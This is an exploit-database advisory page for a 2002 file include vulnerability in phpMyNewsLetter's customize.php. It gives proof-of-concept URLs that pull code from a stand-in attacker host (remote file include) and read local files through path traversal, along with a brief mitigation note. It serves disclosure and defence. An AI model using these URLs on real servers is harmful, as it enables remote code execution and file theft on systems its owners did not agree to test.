header-logo
Suggest Exploit
vendor:
phpMyNewsLetter
by:
SecurityFocus
7.5
CVSS
HIGH
File Include Vulnerability
98
CWE
Product Name: phpMyNewsLetter
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

phpMyNewsLetter File Include Vulnerability

It is possible to pass an attacker-specified file include location to a CGI paramter of the 'customize.php' script. This may allow an attacker to execute arbitrary commands with the privileges of the webserver. Additionally, an attacker may exploit this problem to view local webserver readable files.

Mitigation:

Ensure that user-supplied input is properly validated and filtered before being used in a file include operation.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5886/info

A vulnerability has been discovered in phpMyNewsLetter.

Reportedly, it is possible to pass an attacker-specified file include location to a CGI paramter of the 'customize.php' script. 

This may allow an attacker to execute arbitrary commands with the privileges of the webserver.

Additionally, an attacker may exploit this problem to view local webserver readable files.

http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
<? echo $text; ?>

or
http://[target]/include/customize.php?l=../path/file/to/view

Navigation

Suggest Exploit

Services By CQR